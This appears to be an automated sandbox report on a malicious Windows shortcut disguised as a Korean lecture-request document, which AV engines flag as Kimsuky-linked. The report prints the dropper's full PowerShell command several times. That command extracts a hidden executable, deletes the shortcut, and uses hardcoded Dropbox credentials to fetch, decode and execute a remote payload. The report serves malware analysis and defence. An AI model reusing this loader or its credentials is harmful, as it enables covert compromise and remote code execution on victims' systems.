NtAllocateVirtualMemory July 15, 2024, 4:54 p.m.	process_identifier: 2356 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02052000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2024, 4:54 p.m.	process_identifier: 2356 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02065000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2024, 4:54 p.m.	process_identifier: 2356 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ff5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2024, 4:54 p.m.	process_identifier: 2356 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0205c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2024, 4:54 p.m.	process_identifier: 2356 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2024, 4:54 p.m.	process_identifier: 2356 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ff6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2024, 4:54 p.m.	process_identifier: 2356 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0206c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2024, 4:54 p.m.	process_identifier: 2356 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02053000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2024, 4:54 p.m.	process_identifier: 2356 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02054000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2024, 4:54 p.m.	process_identifier: 2356 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02055000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2024, 4:54 p.m.	process_identifier: 2356 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02056000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2024, 4:54 p.m.	process_identifier: 2356 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02057000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2024, 4:54 p.m.	process_identifier: 2356 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02058000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2024, 4:54 p.m.	process_identifier: 2356 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02059000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2024, 4:54 p.m.	process_identifier: 2356 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05000000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2024, 4:54 p.m.	process_identifier: 2356 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05001000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2024, 4:54 p.m.	process_identifier: 2356 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05002000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2024, 4:54 p.m.	process_identifier: 2356 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05003000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2024, 4:54 p.m.	process_identifier: 2356 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05004000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2024, 4:54 p.m.	process_identifier: 2356 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05005000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2024, 4:54 p.m.	process_identifier: 2356 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05006000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2024, 4:54 p.m.	process_identifier: 2356 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05007000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2024, 4:54 p.m.	process_identifier: 2356 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05008000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2024, 4:54 p.m.	process_identifier: 2356 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05009000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2024, 4:54 p.m.	process_identifier: 2356 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0500a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2024, 4:54 p.m.	process_identifier: 2356 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0500b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2024, 4:54 p.m.	process_identifier: 2356 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0500c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2024, 4:54 p.m.	process_identifier: 2356 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0500d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2024, 4:54 p.m.	process_identifier: 2356 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0500e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2024, 4:54 p.m.	process_identifier: 2356 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0500f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2024, 4:54 p.m.	process_identifier: 2356 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05010000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2024, 4:54 p.m.	process_identifier: 2356 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05011000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2024, 4:54 p.m.	process_identifier: 2356 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05012000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2024, 4:54 p.m.	process_identifier: 2356 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05013000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2024, 4:54 p.m.	process_identifier: 2356 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05014000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (2 events)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
file	C:\Users\test22\AppData\Local\Temp\멀티캠퍼스 강연의뢰서_ 김병로 교수님 .docx.lnk

Creates a suspicious process (2 events)

cmdline

"C:\Windows\system32\cmd.exe" /c powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = 'C:\Users\test22\AppData\Local\Temp';$lnkpath = Get-ChildItem *.lnk;foreach ($path in $lnkpath) { if ($path.length -eq 0x00103CFB) { $lnkpath = $path;}}foreach ($item in $lnkpath) { $lnkpath = $item.Name;}$InputStream = New-Object System.IO.FileStream($lnkpath, [IO.FileMode]::Open, [System.IO.FileAccess]::Read);$file=New-Object Byte[]($InputStream.length);$len=$InputStream.Read($file,0,$file.Length);$InputStream.Dispose();write-host \"readfileend\";$path = $lnkpath.substring(0,$lnkpath.length-4);$len1 = 1057132;$len2 = 1062657;$len3 = 1062657;$temp = New-Object Byte[]($len2-$len1);write-host \"exestart\";for($i=$len1; $i -lt $len2; $i++) { $temp[$i-$len1] = $file[$i]};sc $path ([byte[]]$temp) -Encoding Byte;write-host \"exeend\";$temp = New-Object Byte[]($file.Length-$len3);for($i=$len3; $i -lt $file.Length; $i++) { $temp[$i-$len3] = $file[$i]}; $encData_b64 = Start-Process -FilePath $path;[System.IO.File]::Delete($lnkpath);Function Decode-Binary { param( [Parameter(Position = 0, Mandatory = $True)] [byte[]] $binary,[Parameter(Position = 1, Mandatory = $True)] [long] $len) [int[]] $poly = @(0, 3, 29, 37, 73);$poly_n = 4;$poly_ord = 73; [byte[]] $ran_state = New-Object byte[] ($poly_ord + 1);for ($i = 0; $i -lt $poly_ord + 1; $i++){ $ran_state[$i] = 1; if ($i -lt $len){ $ran_state[$i] = [byte](($len % ($i + 1)) -band 1);}}for ($i = 0; $i -lt $len; $i++) { for ($j = 1; $j -lt $poly_n; $j++) { $ran_state[$i % $poly_ord] = $ran_state[$i % $poly_ord] -bxor $ran_state[($i + $poly[$j]) % $poly_ord]; } for ($j = 0; $j -lt 8; $j++) { $binary[$i] = $binary[$i] -bxor [byte]((($ran_state[$j] -bxor ($ran_state[($i * ($j + 1)) % $poly_ord] -band $ran_state[(($i + $j) * ($j + 1)) % $poly_ord])) -shl $j));}} return $len } $clientID = \"x2f7205ajf3knq9\";$clientSecret = \"mz2vl6yajc2rpy2\";$refreshToken = \"1G9ctDOJDPUAAAAAAAAAAZYmjGqbo7QXmh9lu_K5JcgYq7UVVP5hXcGJn1v4slGa\";$body = @{grant_type=\"refresh_token\";refresh_token=$refreshToken;client_id=$clientID;client_secret=$clientSecret};$tokenEndpoint = \"https://api.dropboxapi.com/oauth2/token\";$response = Invoke-RestMethod -Uri $tokenEndpoint -Method Post -Body $body;if ($response.access_token) {$accessToken = $response.access_token;}$downloadUrl = \"https://content.dropboxapi.com/2/files/download\";$remoteFilePath = \"/0528/ps.bin\";$request = [System.Net.HttpWebRequest]::Create($downloadUrl);$request.Method = \"POST\";$request.Headers.Add(\"Authorization\", \"Bearer $accessToken\");$request.Headers.Add(\"Dropbox-API-Arg\", '{\"path\": \"' + $remoteFilePath + '\"}');$response = $request.GetResponse();$receiveStream = $response.GetResponseStream();if ($receiveStream -ne $null) {$streamReader = New-Object System.IO.StreamReader($receiveStream);$memoryStream = New-Object System.IO.MemoryStream;$buffer = New-Object byte[] 1024;$read = 0;do { $read = $receiveStream.Read($buffer, 0, $buffer.Length);$memoryStream.Write($buffer, 0, $read);} while ($read -gt 0);$enc_bytes = $memoryStream.ToArray();Decode-Binary ($enc_bytes) ($enc_bytes.Length);$newString = [System.Text.Encoding]::UTF8.GetString($enc_bytes);iex $newString;$memoryStream.Close();$streamReader.Close();};$receiveStream.Close();$response.Close();"

cmdline

powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = 'C:\Users\test22\AppData\Local\Temp';$lnkpath = Get-ChildItem *.lnk;foreach ($path in $lnkpath) { if ($path.length -eq 0x00103CFB) { $lnkpath = $path;}}foreach ($item in $lnkpath) { $lnkpath = $item.Name;}$InputStream = New-Object System.IO.FileStream($lnkpath, [IO.FileMode]::Open, [System.IO.FileAccess]::Read);$file=New-Object Byte[]($InputStream.length);$len=$InputStream.Read($file,0,$file.Length);$InputStream.Dispose();write-host \"readfileend\";$path = $lnkpath.substring(0,$lnkpath.length-4);$len1 = 1057132;$len2 = 1062657;$len3 = 1062657;$temp = New-Object Byte[]($len2-$len1);write-host \"exestart\";for($i=$len1; $i -lt $len2; $i++) { $temp[$i-$len1] = $file[$i]};sc $path ([byte[]]$temp) -Encoding Byte;write-host \"exeend\";$temp = New-Object Byte[]($file.Length-$len3);for($i=$len3; $i -lt $file.Length; $i++) { $temp[$i-$len3] = $file[$i]}; $encData_b64 = Start-Process -FilePath $path;[System.IO.File]::Delete($lnkpath);Function Decode-Binary { param( [Parameter(Position = 0, Mandatory = $True)] [byte[]] $binary,[Parameter(Position = 1, Mandatory = $True)] [long] $len) [int[]] $poly = @(0, 3, 29, 37, 73);$poly_n = 4;$poly_ord = 73; [byte[]] $ran_state = New-Object byte[] ($poly_ord + 1);for ($i = 0; $i -lt $poly_ord + 1; $i++){ $ran_state[$i] = 1; if ($i -lt $len){ $ran_state[$i] = [byte](($len % ($i + 1)) -band 1);}}for ($i = 0; $i -lt $len; $i++) { for ($j = 1; $j -lt $poly_n; $j++) { $ran_state[$i % $poly_ord] = $ran_state[$i % $poly_ord] -bxor $ran_state[($i + $poly[$j]) % $poly_ord]; } for ($j = 0; $j -lt 8; $j++) { $binary[$i] = $binary[$i] -bxor [byte]((($ran_state[$j] -bxor ($ran_state[($i * ($j + 1)) % $poly_ord] -band $ran_state[(($i + $j) * ($j + 1)) % $poly_ord])) -shl $j));}} return $len } $clientID = \"x2f7205ajf3knq9\";$clientSecret = \"mz2vl6yajc2rpy2\";$refreshToken = \"1G9ctDOJDPUAAAAAAAAAAZYmjGqbo7QXmh9lu_K5JcgYq7UVVP5hXcGJn1v4slGa\";$body = @{grant_type=\"refresh_token\";refresh_token=$refreshToken;client_id=$clientID;client_secret=$clientSecret};$tokenEndpoint = \"https://api.dropboxapi.com/oauth2/token\";$response = Invoke-RestMethod -Uri $tokenEndpoint -Method Post -Body $body;if ($response.access_token) {$accessToken = $response.access_token;}$downloadUrl = \"https://content.dropboxapi.com/2/files/download\";$remoteFilePath = \"/0528/ps.bin\";$request = [System.Net.HttpWebRequest]::Create($downloadUrl);$request.Method = \"POST\";$request.Headers.Add(\"Authorization\", \"Bearer $accessToken\");$request.Headers.Add(\"Dropbox-API-Arg\", '{\"path\": \"' + $remoteFilePath + '\"}');$response = $request.GetResponse();$receiveStream = $response.GetResponseStream();if ($receiveStream -ne $null) {$streamReader = New-Object System.IO.StreamReader($receiveStream);$memoryStream = New-Object System.IO.MemoryStream;$buffer = New-Object byte[] 1024;$read = 0;do { $read = $receiveStream.Read($buffer, 0, $buffer.Length);$memoryStream.Write($buffer, 0, $read);} while ($read -gt 0);$enc_bytes = $memoryStream.ToArray();Decode-Binary ($enc_bytes) ($enc_bytes.Length);$newString = [System.Text.Encoding]::UTF8.GetString($enc_bytes);iex $newString;$memoryStream.Close();$streamReader.Close();};$receiveStream.Close();$response.Close();"

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW July 15, 2024, 4:54 p.m.	thread_identifier: 2224 thread_handle: 0x00000338 process_identifier: 1784 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\system32\cmd.exe" /c powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = 'C:\Users\test22\AppData\Local\Temp';$lnkpath = Get-ChildItem .lnk;foreach ($path in $lnkpath) { if ($path.length -eq 0x00103CFB) { $lnkpath = $path;}}foreach ($item in $lnkpath) { $lnkpath = $item.Name;}$InputStream = New-Object System.IO.FileStream($lnkpath, [IO.FileMode]::Open, [System.IO.FileAccess]::Read);$file=New-Object Byte[]($InputStream.length);$len=$InputStream.Read($file,0,$file.Length);$InputStream.Dispose();write-host \"readfileend\";$path = $lnkpath.substring(0,$lnkpath.length-4);$len1 = 1057132;$len2 = 1062657;$len3 = 1062657;$temp = New-Object Byte[]($len2-$len1);write-host \"exestart\";for($i=$len1; $i -lt $len2; $i++) { $temp[$i-$len1] = $file[$i]};sc $path ([byte[]]$temp) -Encoding Byte;write-host \"exeend\";$temp = New-Object Byte[]($file.Length-$len3);for($i=$len3; $i -lt $file.Length; $i++) { $temp[$i-$len3] = $file[$i]}; $encData_b64 = Start-Process -FilePath $path;[System.IO.File]::Delete($lnkpath);Function Decode-Binary { param( [Parameter(Position = 0, Mandatory = $True)] [byte[]] $binary,[Parameter(Position = 1, Mandatory = $True)] [long] $len) [int[]] $poly = @(0, 3, 29, 37, 73);$poly_n = 4;$poly_ord = 73; [byte[]] $ran_state = New-Object byte[] ($poly_ord + 1);for ($i = 0; $i -lt $poly_ord + 1; $i++){ $ran_state[$i] = 1; if ($i -lt $len){ $ran_state[$i] = [byte](($len % ($i + 1)) -band 1);}}for ($i = 0; $i -lt $len; $i++) { for ($j = 1; $j -lt $poly_n; $j++) { $ran_state[$i % $poly_ord] = $ran_state[$i % $poly_ord] -bxor $ran_state[($i + $poly[$j]) % $poly_ord]; } for ($j = 0; $j -lt 8; $j++) { $binary[$i] = $binary[$i] -bxor [byte]((($ran_state[$j] -bxor ($ran_state[($i ($j + 1)) % $poly_ord] -band $ran_state[(($i + $j) * ($j + 1)) % $poly_ord])) -shl $j));}} return $len } $clientID = \"x2f7205ajf3knq9\";$clientSecret = \"mz2vl6yajc2rpy2\";$refreshToken = \"1G9ctDOJDPUAAAAAAAAAAZYmjGqbo7QXmh9lu_K5JcgYq7UVVP5hXcGJn1v4slGa\";$body = @{grant_type=\"refresh_token\";refresh_token=$refreshToken;client_id=$clientID;client_secret=$clientSecret};$tokenEndpoint = \"https://api.dropboxapi.com/oauth2/token\";$response = Invoke-RestMethod -Uri $tokenEndpoint -Method Post -Body $body;if ($response.access_token) {$accessToken = $response.access_token;}$downloadUrl = \"https://content.dropboxapi.com/2/files/download\";$remoteFilePath = \"/0528/ps.bin\";$request = [System.Net.HttpWebRequest]::Create($downloadUrl);$request.Method = \"POST\";$request.Headers.Add(\"Authorization\", \"Bearer $accessToken\");$request.Headers.Add(\"Dropbox-API-Arg\", '{\"path\": \"' + $remoteFilePath + '\"}');$response = $request.GetResponse();$receiveStream = $response.GetResponseStream();if ($receiveStream -ne $null) {$streamReader = New-Object System.IO.StreamReader($receiveStream);$memoryStream = New-Object System.IO.MemoryStream;$buffer = New-Object byte[] 1024;$read = 0;do { $read = $receiveStream.Read($buffer, 0, $buffer.Length);$memoryStream.Write($buffer, 0, $read);} while ($read -gt 0);$enc_bytes = $memoryStream.ToArray();Decode-Binary ($enc_bytes) ($enc_bytes.Length);$newString = [System.Text.Encoding]::UTF8.GetString($enc_bytes);iex $newString;$memoryStream.Close();$streamReader.Close();};$receiveStream.Close();$response.Close();" filepath_r: C:\Windows\system32\cmd.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000340	1	1	0
CreateProcessInternalW July 15, 2024, 4:54 p.m.	thread_identifier: 2364 thread_handle: 0x00000084 process_identifier: 2356 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = 'C:\Users\test22\AppData\Local\Temp';$lnkpath = Get-ChildItem .lnk;foreach ($path in $lnkpath) { if ($path.length -eq 0x00103CFB) { $lnkpath = $path;}}foreach ($item in $lnkpath) { $lnkpath = $item.Name;}$InputStream = New-Object System.IO.FileStream($lnkpath, [IO.FileMode]::Open, [System.IO.FileAccess]::Read);$file=New-Object Byte[]($InputStream.length);$len=$InputStream.Read($file,0,$file.Length);$InputStream.Dispose();write-host \"readfileend\";$path = $lnkpath.substring(0,$lnkpath.length-4);$len1 = 1057132;$len2 = 1062657;$len3 = 1062657;$temp = New-Object Byte[]($len2-$len1);write-host \"exestart\";for($i=$len1; $i -lt $len2; $i++) { $temp[$i-$len1] = $file[$i]};sc $path ([byte[]]$temp) -Encoding Byte;write-host \"exeend\";$temp = New-Object Byte[]($file.Length-$len3);for($i=$len3; $i -lt $file.Length; $i++) { $temp[$i-$len3] = $file[$i]}; $encData_b64 = Start-Process -FilePath $path;[System.IO.File]::Delete($lnkpath);Function Decode-Binary { param( [Parameter(Position = 0, Mandatory = $True)] [byte[]] $binary,[Parameter(Position = 1, Mandatory = $True)] [long] $len) [int[]] $poly = @(0, 3, 29, 37, 73);$poly_n = 4;$poly_ord = 73; [byte[]] $ran_state = New-Object byte[] ($poly_ord + 1);for ($i = 0; $i -lt $poly_ord + 1; $i++){ $ran_state[$i] = 1; if ($i -lt $len){ $ran_state[$i] = [byte](($len % ($i + 1)) -band 1);}}for ($i = 0; $i -lt $len; $i++) { for ($j = 1; $j -lt $poly_n; $j++) { $ran_state[$i % $poly_ord] = $ran_state[$i % $poly_ord] -bxor $ran_state[($i + $poly[$j]) % $poly_ord]; } for ($j = 0; $j -lt 8; $j++) { $binary[$i] = $binary[$i] -bxor [byte]((($ran_state[$j] -bxor ($ran_state[($i ($j + 1)) % $poly_ord] -band $ran_state[(($i + $j) * ($j + 1)) % $poly_ord])) -shl $j));}} return $len } $clientID = \"x2f7205ajf3knq9\";$clientSecret = \"mz2vl6yajc2rpy2\";$refreshToken = \"1G9ctDOJDPUAAAAAAAAAAZYmjGqbo7QXmh9lu_K5JcgYq7UVVP5hXcGJn1v4slGa\";$body = @{grant_type=\"refresh_token\";refresh_token=$refreshToken;client_id=$clientID;client_secret=$clientSecret};$tokenEndpoint = \"https://api.dropboxapi.com/oauth2/token\";$response = Invoke-RestMethod -Uri $tokenEndpoint -Method Post -Body $body;if ($response.access_token) {$accessToken = $response.access_token;}$downloadUrl = \"https://content.dropboxapi.com/2/files/download\";$remoteFilePath = \"/0528/ps.bin\";$request = [System.Net.HttpWebRequest]::Create($downloadUrl);$request.Method = \"POST\";$request.Headers.Add(\"Authorization\", \"Bearer $accessToken\");$request.Headers.Add(\"Dropbox-API-Arg\", '{\"path\": \"' + $remoteFilePath + '\"}');$response = $request.GetResponse();$receiveStream = $response.GetResponseStream();if ($receiveStream -ne $null) {$streamReader = New-Object System.IO.StreamReader($receiveStream);$memoryStream = New-Object System.IO.MemoryStream;$buffer = New-Object byte[] 1024;$read = 0;do { $read = $receiveStream.Read($buffer, 0, $buffer.Length);$memoryStream.Write($buffer, 0, $read);} while ($read -gt 0);$enc_bytes = $memoryStream.ToArray();Decode-Binary ($enc_bytes) ($enc_bytes.Length);$newString = [System.Text.Encoding]::UTF8.GetString($enc_bytes);iex $newString;$memoryStream.Close();$streamReader.Close();};$receiveStream.Close();$response.Close();" filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW July 15, 2024, 4:54 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (9 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (2 events)

cmdline

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 3048 resumed a thread in remote process 1784
NtResumeThread July 15, 2024, 4:54 p.m.	thread_handle: 0x00000338 suspend_count: 1 process_identifier: 1784	1	0	0

Creates a suspicious Powershell process (6 events)

option	-nop	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-noninteractive	value	Prevents creating an interactive prompt for the user
option	-nop	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-noninteractive	value	Prevents creating an interactive prompt for the user

The process powershell.exe wrote an executable file to disk (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

File has been identified by 22 AntiVirus engines on VirusTotal as malicious (22 events)

Skyhigh	BehavesLike.Dropper.tx
VIPRE	Heur.BZC.YAX.Boxter.781.B4AAC4E8
Arcabit	Heur.BZC.YAX.Boxter.781.B4AAC4E8
Symantec	Scr.Mallnk!gen13
ESET-NOD32	LNK/Kimsuky.I
Avast	LNK:Agent-EW [Trj]
Kaspersky	HEUR:Trojan.Multi.Agent.gen
BitDefender	Heur.BZC.YAX.Boxter.781.B4AAC4E8
MicroWorld-eScan	Heur.BZC.YAX.Boxter.781.B4AAC4E8
Rising	Trojan.PSRunner/LNK!1.DB7E (CLASSIC)
Emsisoft	Trojan.PowerShell.Gen (A)
FireEye	Heur.BZC.YAX.Boxter.781.B4AAC4E8
Sophos	Troj/LnkObf-T
MAX	malware (ai score=89)
Kingsoft	Script.Troj.BigLnk.22142
ZoneAlarm	HEUR:Trojan.Multi.Agent.gen
GData	Heur.BZC.YAX.Boxter.781.B4AAC4E8
